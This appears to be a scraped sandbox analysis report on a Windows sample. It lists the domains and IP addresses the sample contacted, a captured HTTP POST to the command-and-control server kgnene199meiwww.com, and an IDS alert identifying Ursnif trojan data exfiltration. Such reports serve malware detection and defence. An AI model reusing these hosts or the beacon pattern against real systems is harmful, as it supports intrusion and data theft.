16c624
Analyzed on January 25th 2017 08:47:49 (CEST) running the Kernelmode monitor and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by VxStream Sandbox v5.60 © Payload Security
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
Details | |||||
---|---|---|---|---|---|
Loading content, please wait...
Tip: Click an analysed process below to view more details.
Analysed 5 processes in total (System Resource Monitor).
Domain | Address | Country |
---|---|---|
grohotibombivasebut45.com | - | - |
iwdiwjdiwjdwdwd198.com | - | - |
rodnenekieh120.com | - | - |
kgnene199meiwww.com | 77.91.144.64 | Ukraine |
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
148.163.112.203 OSINT |
31780 UDP |
explorer.exe PID: 1948 |
United States
ASN: 53755 (Input Output Flood LLC) |
77.91.144.64 OSINT |
80 TCP |
explorer.exe PID: 1948 |
Ukraine
ASN: 24962 (Telesystems of Ukraine LLC) |
148.163.112.203 OSINT |
22045 TCP |
explorer.exe PID: 1948 |
United States
ASN: 53755 (Input Output Flood LLC) |
Endpoint | Request | URL | |
---|---|---|---|
77.91.144.64:80 | POST | /images/T5bBOV8l85Qk1/m8Wl9syM/yPg5RYaxlJ8t4CrLMAkdkSy/b0JDQA4Xqq/1aYEyJL_2Fnsujt5c/5mv7Me0nN3_2/BvKyV5_2Bqg/bp9V0946G0tkea/Htr7... | POST /images/T5bBOV8l85Qk1/m8Wl9syM/yPg5RYaxlJ8t4CrLMAkdkSy/b0JDQA4Xqq/1aYEyJL_2Fnsujt5c/5mv7Me0nN3_2/BvKyV5_2Bqg/bp9V0946G0tkea/Htr779_2FUYQgiM_2FgOU/pt19z1zdnUczVV5_/2Fyb9bXrj8t/8HEEp3.bmp HTTP/1.1
Content-Type: multipart/form-data; boundary=397127342909960221985636
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: kgnene199meiwww.com
Content-Length: 415
Connection: Keep-Alive
Cache-Control: no-cache More Details |
Event | Category | Description | SID |
---|---|---|---|
77.91.144.64:80 (TCP) | A Network Trojan was detected | ET TROJAN Ursnif Variant CnC Data Exfil | 2021830 |
Antelox commented 10 hours ago updated moment ago